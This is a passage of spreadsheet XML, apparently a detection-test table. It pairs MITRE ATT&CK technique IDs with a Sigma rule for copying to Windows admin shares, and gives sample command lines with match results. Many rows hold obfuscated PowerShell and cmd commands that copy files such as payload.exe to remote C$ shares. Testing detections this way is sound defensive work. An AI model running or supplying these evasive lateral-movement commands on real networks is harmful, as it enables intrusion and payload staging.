      <c r="G70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I70" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K70" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B71" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C71" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D71" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E71" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfILe -cOmmand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F71" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G71" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H71" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I71" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J71" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K71" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B72" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C72" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D72" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E72" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -COmMANd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F72" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I72" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J72" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K72" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B73" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C73" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D73" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E73" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F73" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I73" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J73" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K73" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B74" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C74" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D74" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E74" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F74" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J74" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K74" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B75" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C75" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D75" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E75" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F75" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J75" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K75" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B76" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C76" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D76" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E76" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comManD "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F76" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G76" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H76" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J76" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K76" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B77" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C77" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D77" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E77" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F77" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G77" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H77" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J77" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B78" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C78" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D78" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E78" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F78" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I78" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J78" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K78" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B79" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C79" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D79" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E79" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F79" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I79" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J79" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K79" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B80" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C80" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D80" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E80" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F80" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G80" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H80" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I80" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J80" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K80" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B81" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C81" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D81" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E81" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F81" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I81" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J81" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B82" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C82" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D82" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E82" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F82" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I82" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J82" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K82" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B83" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C83" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D83" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E83" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaND "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F83" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I83" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J83" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B84" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C84" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D84" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E84" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F84" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G84" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H84" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I84" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J84" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B85" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C85" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D85" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E85" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -commAND "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F85" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I85" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J85" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B86" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C86" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D86" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E86" s="44" t="inlineStr">
        <is>
          <t>powershell -NoPRofILE -comMand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F86" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G86" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H86" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B87" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C87" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D87" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E87" s="44" t="inlineStr">
        <is>
          <t>powershell -nOPrOFiLE -c "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F87" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I87" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J87" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K87" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B88" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C88" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D88" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E88" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfILe -cOmmand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F88" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I88" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J88" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K88" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B89" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C89" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D89" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E89" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -COmMANd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F89" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I89" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J89" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K89" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B90" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C90" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D90" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E90" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F90" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G90" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H90" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I90" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J90" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K90" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B91" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C91" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D91" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E91" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F91" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I91" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J91" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K91" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B92" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C92" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D92" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E92" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F92" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G92" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H92" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I92" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J92" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K92" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B93" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C93" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D93" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E93" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comManD "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F93" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G93" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H93" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I93" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J93" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K93" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B94" s="44" t="inlineStr">
        <is>
